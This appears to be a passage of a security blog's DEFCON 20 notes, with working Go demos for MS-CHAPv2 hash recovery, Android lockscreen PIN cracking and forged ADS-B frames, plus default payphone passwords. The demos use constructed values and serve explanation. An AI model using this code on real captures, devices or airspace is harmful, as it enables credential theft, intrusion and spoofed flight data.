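)

// Constructed demo values, not captured traffic: challenges and username cross the
// wire in the clear; the NT hash (MD4 of the UTF-16LE password) is the one unknown.
var (
	peerChallengeDemo = [16]byte{1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16}
	authChallengeDemo = [16]byte{16, 15, 14, 13, 12, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1}
	userDemo          = "alice"
	ntHashDemo        = [16]byte{0x9A, 0x1B, 0xC3, 0x4D, 0x5E, 0x6F, 0x70, 0x81,
		0x92, 0xA3, 0xB4, 0xC5, 0xD6, 0xE7, 0xF8, 0x09}
)

// challengeHash is RFC 2759 ChallengeHash(): the 8-byte DES plaintext is built
// only from values an eavesdropper already has.
func challengeHash(peer, auth [16]byte, user string) [8]byte {
	h := sha1.New()
	h.Write(peer[:])
	h.Write(auth[:])
	h.Write([]byte(user))
	var out [8]byte
	copy(out[:], h.Sum(nil)[:8])
	return out
}

// desBlock: single DES of one block under a 7-byte (56-bit) key.  The 56 bits
// are spread 7 per key byte; the parity bit stays zero, which DES ignores.
func desBlock(k7 []byte, pt [8]byte) [8]byte {
	var v uint64
	for _, b := range k7 {
		v = v<<8 | uint64(b)
	}
	key := make([]byte, 8)
	for i := range key {
		key[i] = byte(v>>(49-7*uint(i))) << 1
	}
	c, err := des.NewCipher(key)
	if err != nil { panic(err) }
	var ct [8]byte
	c.Encrypt(ct[:], pt[:])
	return ct
}

// ntResponse is RFC 2759 ChallengeResponse(): pad the hash to 21 bytes, cut it
// into three 7-byte keys, encrypt the same challenge under each.  That is three
// independent single-DES operations, not 3DES.
func ntResponse(challenge [8]byte, ntHash [16]byte) [24]byte {
	var padded [21]byte // bytes 16..20 stay zero
	copy(padded[:], ntHash[:])
	var resp [24]byte
	for i := 0; i < 3; i++ {
		ct := desBlock(padded[7*i:7*i+7], challenge)
		copy(resp[8*i:], ct[:])
	}
	return resp
}

// recoverThirdKey: key 3 is ntHash[14:16] plus five zero bytes, so 2^16 tries.
func recoverThirdKey(challenge [8]byte, resp [24]byte) ([2]byte, bool) {
	var target [8]byte
	copy(target[:], resp[16:])
	var k7 [7]byte
	for g := 0; g < 1<<16; g++ {
		k7[0], k7[1] = byte(g>>8), byte(g)
		if desBlock(k7[:], challenge) == target {
			return [2]byte{k7[0], k7[1]}, true
		}
	}
	return [2]byte{}, false
}

// searchBothKeys walks the given 56-bit key windows once, testing each candidate
// against BOTH of the first two response blocks.  They encrypt the same plaintext,
// so a single pass yields both keys: 2^56 work, not 2^57.  Pico's FPGAs run this
// over [0, 2^56); on a laptop you pass tiny windows.
func searchBothKeys(challenge [8]byte, resp [24]byte, windows [][2]uint64) (k1, k2 [7]byte, found int) {
	var c1, c2 [8]byte
	copy(c1[:], resp[0:8])
	copy(c2[:], resp[8:16])
	var k7 [7]byte
	for _, w := range windows {
		for k := w[0]; k <= w[1] && found < 2; k++ {
			for i := range k7 {
				k7[i] = byte(k >> (48 - 8*uint(i)))
			}
			ct := desBlock(k7[:], challenge)
			if ct == c1 {
				k1, found = k7, found+1
			}
			if ct == c2 {
				k2, found = k7, found+1
			}
		}
	}
	return
}
```

Usage: `resp := ntResponse(challengeHash(peerChallengeDemo, authChallengeDemo, userDemo), ntHashDemo)`, then `recoverThirdKey` gives hash bytes 14 and 15 in 65,536 DES operations, and `searchBothKeys` over windows around 0x9A1BC34D5E6F70 and 0x8192A3B4C5D6E7 (the demo hash’s first two 7-byte slices) returns the rest; concatenating k1, k2 and k3 reproduces ntHashDemo, which is what chapcrack hands to CloudCracker to recover at scale.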
“Exploit Archaeology: Raiders of the Lost Payphones”: More of a fun panel than a practical one, covering all the stuff the presenter went through to find documentation and tools for an old Elcotel payphone he was given. Among other things:
- The upper housing lock (which covers the internal phone mechanism, including the reset to defaults button) is a relatively easy to pick 3-pin lock (with “anti-impressioning divots”).
- The lower housing (where the money is stored) is a much harder to pick 4-pin lock. But the presenter got lucky…
- You also need a special tool, called a T-wrench, to do certain things. The presenter was able to improvise one…
So once you’ve got a payphone, what can you do with it? You can hook it to an ATA and connect to an Asterisk system, and have some fun that way. (The presenter pointed out that by law, 911 calls are required to be free. So he had some fun connecting the payphone to his Asterisk system, and configuring it so dialing 911 on the payphone got an outside line through Asterisk.)
Anyway, it turns out that there are three ways to program/reprogram these phones: there was specialized software available (Elcotel has been out of business for years, but the presenter managed to get a copy of the software, crack it, and get it running), local telemetry (where you open up the upper housing, reset the phone, and let it guide you through voice prompts for reprogramming), or remote telemetry (the phone has a modem). VOIP, by the way, is not well suited to modems.
Some notes:
- these phones have a default ID of 9999
- a default password of 99999999
- a secondary password of 88888888
- The phone ID is generally set to the last four digits of the phone number.
- And the passwords are frequently left at the default.
There’s some other fun stuff you can do with an old payphone. For example, the presenter managed to rig up his phone, a Pwn Plug, and some custom scripting into a system that allows you to run Nmap port scans over the phone. But I’ll leave details of that for his presentation when he puts it up.
“Into the Droid: Gaining Access to Android User Data”: Excellent presentation covering some of the ways you can get user data out of an Android device, even if it is locked or encrypted. For example:
- you can use the abootimg tool to create a custom boot image, intercept the phone’s bootloader, and force it to use your image.
- Special USB debug cables work on some devices.
- The lockscreen and system password hashes, along with the salt they were computed with, can be pulled out of specific locations on the device and cracked with something like oclHashcat-lite. (See the presentation for specific details on where the salt and key are located.)
- Applications with no permissions can still create a root shell and send information back to an end user (by hiding data in URL parameters, for example).
- There’s a specific distribution, Santoku Linux, designed for mobile device forensics (both IOS and Android). This is a work in progress, per the presenter…
(While I’m at it, let me say that I’m really impressed with viaForensics, especially their presentation page. Not only did they have the DEFCON presentation up, but it looks like there’s a lot of other good stuff there as well. I’m particularly interested in “iPhone Forensics with free and/or open source tools” and the “Android Forensics Training Presentation“.)
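The lockscreen bullet above, as an added Go example that is my code rather than viaForensics’ tooling: it reproduces the Android 4.0 to 4.3 scheme as implemented in AOSP’s LockPatternUtils (password.key holds the uppercase hex SHA-1 and MD5 of PIN + Long.toHexString(salt), with the salt stored in settings.db under lockscreen.password_salt) and brute-forces a numeric PIN against it. The PIN and salt here are constructed; on a real device you would feed in the pulled /data/system/password.key contents and the salt from the database. The format details come from AOSP, not from the slides.

```go
package main

import (
	"crypto/md5"
	"crypto/sha1"
	"encoding/hex"
	"fmt"
	"strconv"
	"strings"
)

// Constructed inputs standing in for two artifacts pulled off an Android 4.0-4.3
// device: the signed 64-bit lockscreen.password_salt value from settings.db and
// the PIN that produced /data/system/password.key.
const demoSalt int64 = -3580367176345734232
const demoPIN = "4271"

// saltString matches Java's Long.toHexString(): lowercase hex of the two's
// complement value, no zero padding.
func saltString(salt int64) string {
	return strconv.FormatUint(uint64(salt), 16)
}

// passwordToHash mirrors LockPatternUtils.passwordToHash in AOSP 4.0-4.3: the
// 72-hex-char file is uppercase SHA-1 then MD5 over (password + saltString).
// One hash iteration and a small PIN space is why this falls to a GPU quickly.
func passwordToHash(pw string, salt int64) string {
	data := []byte(pw + saltString(salt))
	s := sha1.Sum(data)
	m := md5.Sum(data)
	return strings.ToUpper(hex.EncodeToString(s[:]) + hex.EncodeToString(m[:]))
}

// crackPIN brute-forces numeric PINs of minLen..maxLen digits against the SHA-1
// half of password.key, the same half an oclHashcat-lite style attack targets.
func crackPIN(passwordKey string, salt int64, minLen, maxLen int) (string, bool) {
	if len(passwordKey) < 40 {
		return "", false
	}
	want := strings.ToUpper(passwordKey[:40])
	for n := minLen; n <= maxLen; n++ {
		limit := 1
		for i := 0; i < n; i++ {
			limit *= 10
		}
		for v := 0; v < limit; v++ {
			pin := fmt.Sprintf("%0*d", n, v) // zero-padded to n digits
			h := sha1.Sum([]byte(pin + saltString(salt)))
			if strings.ToUpper(hex.EncodeToString(h[:])) == want {
				return pin, true
			}
		}
	}
	return "", false
}

func main() {
	key := passwordToHash(demoPIN, demoSalt) // what password.key would contain
	fmt.Println("salt   :", saltString(demoSalt))
	fmt.Println("key    :", key)
	pin, ok := crackPIN(key, demoSalt, 4, 4)
	fmt.Println("cracked:", pin, ok)
}
```

Note that a wrong salt yields no hit at all rather than a wrong PIN, which is a useful sanity check when you are unsure you pulled the salt from the right database row.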
“Off Grid Communications with Android – Meshing the Mobile World”: Solid presentation discussing the Android networking stack, hacking the stack and flipping chipsets into ad-hoc mode, and network routing algorithms. End result: the SPAN project on github, which provides open-source tools for Android mesh networks. (There’s also a paper in that repository that covers the same ground as the presentation, including sexy diagrams of the Android network stack.)
“The Safety Dance – Wardriving the Public Safety Band”: Basically: public safety providers are moving into the 4.9 GHz band. And it is possible to monitor their traffic using equipment bought for cheap off eBay, or equipment that, with the right drivers, can be tuned down to 4.9 GHz. One of the presenters has a blog entry here that covers some of what was in the presentation, and the github repository of their patched drivers, etc. can be found here.
I missed Kaminsky’s “Black Ops” presentation for reasons of the Penn and Teller theater being full, and I can’t find it online (yet). So I wandered over to Renderman’s “Hacker + Airplanes = No Good Can Come Of This” and got there a little late; late enough, as it turned out, that I missed Renderman observing that he was constantly being scheduled on panels opposite Kaminsky, and darn it, he’d really like to see a Kaminsky panel.
But I digress.
So have you ever wondered how things like PlaneFinder work? As part of the government’s efforts to bring air traffic control into the 20th Century, they’ve implemented something called ADS-B. Planes equipped with ADS-B transmitters send out data (such as their aircraft ID, altitude, GPS coordinates, bearing, and speed), which is picked up by ground stations and fed into the systems that feed PlaneFinder and other such sites. There are two types: ADS-B Out, which is sent automatically as a broadcast, and ADS-B In, which allows planes to listen to each other’s ADS-B Out broadcasts, so that (in theory) they’re aware of each other without needing air traffic control.
(According to the presentation that followed Renderman, ADS-B is at about 70% penetration for commercial aircraft, and much lower for general aviation. The government’s goal is to have the majority of traffic on the system by 2020.)
When does this get interesting? Right about now. First of all, anyone can build a ground station and receive ADS-B broadcasts. Renderman has. (I understand there’s been quite a bit of work on using cheap-ass USB digital TV tuners as ADS-B receivers.) That gets you access to the flight data going over your head.
But wait, there’s more! ADS-B has no authentication and no encryption built in. That means anyone with the proper equipment (a radio that transmits at 1090 MHz) can spoof ADS-B broadcasts.
Remember the part above about how planes could use ADS-B to keep track of each other’s positions, bypassing ATC? Have you booked your Amtrak ticket yet?
As ADS-B usage grows, attacks are likely to become more disruptive. What happens if someone starts jamming ADS-B signals? Or inserting fake flight data? Or has the same fake plane in two places at once? The official response, according to Renderman, boils down to “trust us”. “Us” being the same folks who brought you Operation Fast and Furious. Pull the other one, guys; it has bells on.
Edited to add: Link to Renderman’s slides for this presentation added 8/1/2012.
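To make the “no authentication” point concrete, here is an added Go example (my code, not Renderman’s) that decodes a DF17 aircraft-identification squitter and then builds one from scratch. The only integrity mechanism in the frame is the public Mode S 24-bit CRC (generator 0x1FFF409), so any frame with a recomputed parity field passes every check a receiver performs. The real frame used is the widely reproduced 8D4840D6202CC371C32CE0576098 (ICAO 4840D6, callsign KLM1023); the forged ICAO address and callsign are made up. This only produces bytes; it does not touch a radio.

```go
package main

import (
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// Mode S protects a 112-bit extended squitter with a 24-bit CRC (generator
// 0x1FFF409): the last 24 bits of a DF17 frame are the remainder over the first
// 88.  It catches bit errors; it authenticates nothing.
const crcPoly uint32 = 0x1FFF409

// crc24 divides the whole frame by the generator.  A received frame checks out when
// the result is 0; with the last three bytes zeroed it yields the parity to append.
func crc24(frame []byte) uint32 {
	var b [112]byte
	for i := range b {
		b[i] = (frame[i/8] >> (7 - uint(i%8))) & 1
	}
	for i := 0; i < 88; i++ {
		if b[i] == 1 {
			for j := 0; j < 25; j++ {
				b[i+j] ^= byte((crcPoly >> (24 - uint(j))) & 1)
			}
		}
	}
	var rem uint32
	for i := 88; i < 112; i++ {
		rem = rem<<1 | uint32(b[i])
	}
	return rem
}

// getBits reads n bits starting at bit offset start, MSB first.
func getBits(frame []byte, start, n int) int {
	v := 0
	for i := start; i < start+n; i++ {
		v = v<<1 | int((frame[i/8]>>(7-uint(i%8)))&1)
	}
	return v
}

// 6-bit alphabet of the aircraft identification message (type codes 1-4).
const charset = "#ABCDEFGHIJKLMNOPQRSTUVWXYZ#####_###############0123456789######"

// decodeIdent returns ICAO address and callsign from a DF17 identification frame.
func decodeIdent(hexFrame string) (icao uint32, callsign string, err error) {
	frame, err := hex.DecodeString(hexFrame)
	if err != nil || len(frame) != 14 || crc24(frame) != 0 {
		return 0, "", errors.New("not a 112-bit frame with a valid CRC")
	}
	if df := getBits(frame, 0, 5); df != 17 {
		return 0, "", fmt.Errorf("not DF17: DF=%d", df)
	}
	if tc := getBits(frame, 32, 5); tc < 1 || tc > 4 {
		return 0, "", fmt.Errorf("not an identification message: TC=%d", tc)
	}
	var sb strings.Builder
	for i := 0; i < 8; i++ {
		sb.WriteByte(charset[getBits(frame, 40+6*i, 6)])
	}
	return uint32(getBits(frame, 8, 24)), strings.TrimRight(sb.String(), "_#"), nil
}

// buildIdent is the flip side: nothing in the frame is signed, so anyone can
// assemble a DF17 identification message (callsign up to 8 chars, A-Z/0-9) that
// passes every check a receiver performs.
func buildIdent(icao uint32, callsign string) string {
	f := make([]byte, 14)
	f[0] = 17<<3 | 5 // DF=17, CA=5
	f[1], f[2], f[3] = byte(icao>>16), byte(icao>>8), byte(icao)
	f[4] = 4 << 3 // TC=4 (identification), emitter category 0
	cs := fmt.Sprintf("%-8s", strings.ToUpper(callsign))
	for i := 0; i < 8; i++ {
		v := strings.IndexByte(charset, cs[i])
		if cs[i] == ' ' || v < 0 {
			v = 32 // the '_' slot encodes a space
		}
		for b := 5; b >= 0; b-- {
			if (v>>uint(b))&1 == 1 {
				pos := 40 + 6*i + (5 - b)
				f[pos/8] |= 1 << uint(7-pos%8)
			}
		}
	}
	rem := crc24(f) // parity bytes are still zero at this point
	f[11], f[12], f[13] = byte(rem>>16), byte(rem>>8), byte(rem)
	return strings.ToUpper(hex.EncodeToString(f))
}

func main() {
	// A real frame, then a forged one for a made-up aircraft; both decode cleanly.
	fmt.Println(decodeIdent("8D4840D6202CC371C32CE0576098"))
	fmt.Println(decodeIdent(buildIdent(0xABCDEF, "GHOST1")))
}
```

Flipping a single bit in the real frame is rejected by the CRC, which is exactly the kind of check receivers rely on; the forged frame passes it because the CRC is a public function of the payload, which is the whole problem Renderman was pointing at.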
“Busting the BARR: Tracking ‘Untrackable’ Private Aircraft for Fun & Profit”: A semi-related panel to Renderman’s. So how does PlaneFinder get the data that comes from ADS-B broadcasts? The FAA has a feed (called ASDI: Aircraft Situation Display to Industry); they’ll send you the data in XML format, and you can parse it and display it and hug it and squeeze it and call it George, if you want.
However, the FAA also has something called the “Block Aircraft Registration Request”. If you’re someone who doesn’t want their flight information made public, you can put your aircraft on the BARR list. This doesn’t strip your data out of the ASDI feed; that’s still there, but sites that use ASDI (like FlightAware) can’t display information for flights on the BARR. (If you want to subscribe to the ASDI feed, write an XML parser, and be notified every time Jay Z’s plane takes off and lands, more power to you. You just can’t share that information with others.)
So how did the presenters work around that? Their project basically comes down to:
- Monitoring LiveATC.net and downloading ATC communications.
- Using speech recognition to pull out flight information (such as tail numbers of planes).
- Profit. Or in this case, OpenBARR.net, which is still in testing.
That was enough excitement for one day. I seriously thought about entering the DEFCON Beard Competition, but I couldn’t tell if there was a cash prize and I don’t want the IOC revoking my status as an amateur.
-2 Day DEFCON 20 notes.
Monday, July 23rd, 2012
The schedule for DEFCON 20 is up.
Lawrence reminded me on Saturday that I also had not solicited panel requests, so this is your pre-DEFCON 20 post.
I’m flying out Wednesday morning and getting to Las Vegas around 1 PM. I’m hoping to visit the Mob Museum (just because it is new since my last visit, and I haven’t seen it) and to make a return trip to the two bookstores I visited last year. Lotus of Siam is also required.
There is some stuff going on at DEFCON on Thursday:
- “Breaking Wireless Encryption Keys”: I’m generally familiar with the how-to of breaking WEP, and the attacks against WPA. I keep meaning to set up a lab and do some WEP attacks, but I never get around to it (always something else going on), and I’ve never actually seen it done, so this panel intrigues me.
- “Intro to Digital Forensics: Tools & Tactics”: Another possibility. My experience with forensic tools is weak.
- “HF skiddies suck, don’t be one. Learn some basic Python.”: A maybe, more for the Python angle than anything else.
Here’s what I’m interested in on Friday:
- “Making Sense of Static – New Tools for Hacking GPS”: As you know, Bob, I’m fascinated by GPS, and I’m curious to see what these guys come up with.
- “Not So Super Notes, How Well Does US Dollar Note Security Prevent Counterfeiting?”: I don’t think I’ve mentioned this before, but I have an academic fascination with counterfeiting. Then again, who isn’t attracted to the idea of making your own money?
- “How to Hack VMware vCenter Server in 60 Seconds”: I have to work with VMware from time to time in my real job, so…
- “Bypassing Endpoint Security for $20 or Less”: I like cheap.
- “Safes and Containers: Insecurity Design Excellence”: “…design issues that allow locks and safes to be opened in seconds, focusing on consumer-level containers that are specified as secure for storing valuables and weapons, and in-room hotel safes that travelers rely upon.” Enough said.
Saturday, we have a possible tie for this year’s “Hippie, PLEASE” panel:
- “Twenty Years Back, Twenty Years Ahead: The Arc of DEF CON Past and Future”: the description doesn’t sound all that obnoxious, but Richard Thieme is a multiple past winner of the “Hippie, PLEASE” DEFCON panel award.
- And, “Beyond the War on General Purpose Computing: What’s Inside the Box?” by none other than C*ry D*ctr*w.
I shan’t be attending either. The Saturday panels I am interested in:
- Either “Creating an A1 Security Kernel in the 1980s (Using ‘Stone Knives and Bear Skins’)” or “Defeating PPTP VPNs and WPA2 Enterprise with MS-CHAPv2”: I do kind of like historical perspective panels, but I’m also really interested in the MS-CHAP attack.
- “Exploit Archaeology: Raiders of the Lost Payphones”: Payphones? PAYPHONES? Apparently, those are still a thing you can attack. (“Stamp Out Hash Corruption! Crack All The Things” does deserve a nod, though, for the Hyperbole and a Half reference.)
- “Into the Droid: Gaining Access to Android User Data”: Android hacking is still hot.
- “Off-Grid Communications with Android: Meshing the Mobile World”: I like the idea of “Smart Phone AdHoc Networks”, if for no other reason than as a fallback in case of disaster.
- “The Safety Dance – Wardriving the Public Safety Band”: I’ve kind of dropped away from it, but I used to be a scanner/shortwave geek, and this panel has me curious.
- “Black Ops” or “Hacker + Airplanes = No Good Can Come Of This”: I’m a big fan of both Dan Kaminsky and Renderman, and I really really want to see both of these panels. I’ll probably hit Kaminsky’s panel unless I can’t get in. And I do resent the fact that DEFCON scheduled these two panels against each other. (“Spy vs Spy: Spying on Mobile Device Spyware” also sounds fun, but given a choice, I’ll take Kaminsky or Renderman.)
- “Busting the BARR: Tracking ‘Untrackable’ Private Aircraft for Fun & Profit”: This will depend on how I feel at the end of the day: I’m kind of interested, and I think a couple of my friends will be as well, but if I’m feeling worn out, I may skip it. I’m also kind of curious about “The Darknet of Things, Building Sensor Networks That Do Your Bidding”: mostly I want to see if these guys are Arduino-based, and if they are, I might hit that instead.
Sunday! Sunday! Sunday! Live at DEFCON 20! Nitro-burning FUNNY CARS!
- “SIGINT and Traffic Analysis for the Rest of Us”: I’m also a big fan of Matt Blaze. As an ex-radio geek I’m interested in SIGINT. And I’ve read the P25 paper, so this pushes several buttons at once.
- “SCADA HMI and Microsoft Bob: Modern Authentication Flaws With a 90’s Flavor”: SCADA: hot. Plus gratuitous Microsoft Bob reference.
- “Owning the Network: Adventures in Router Rootkits”. Seems like the best thing going on in that slot at that time.
- “Hacking [Redacted] Routers”: See above.
- “SQL Injection to MIPS Overflows: Rooting SOHO Routers”: See previous two entries. At this point, I may be routered-out, so I reserve the right to skip this one.
- “Hacking the Google TV”: This might be my only chance to see someone hack what, so far, has been a total failure.
- Pretty much have to go to the closing ceremonies.
So that’s that. If anyone has any specific panel requests after looking over the posted schedule, let me know (by email or in the comments), and I’ll try to hit those events. Also, if anyone has any recommendations for new, cool, or interesting places to eat in Vegas, feel free to leave those in comments.
(Edited to add: It’s a Borepatch-o-lanche! Thank you, brother man!)
Noted.
Thursday, May 17th, 2012
I can get Wired for a buck an issue if I use the blow-in cards that come with the print edition. (I can also frequently get Wired for a buck an issue if I purchase it at Half-Price Books.)
If I go to their website to subscribe, the combined print/tablet issue costs $1.67 an issue. The tablet or print issues by themselves cost $1.25 an issue.
If I get the Wired app from Amazon for the Fire, yep, $1.67 an issue if I do an in-app purchase. And the app gets mixed reviews.
(Current print subscribers apparently get the content for free. Which means that it makes more sense to go to Wired’s web site and subscribe than it does to do an in-app purchase: $15 vs. $19.99. It makes even more sense to subscribe using the cards, but then I have to deal with the print editions.)
Look, Conde Nasties, I’d be happy to subscribe to the Kindle edition of Wired. But I want at least as good a deal as you give on those blow-in cards. One dollar an issue or bust!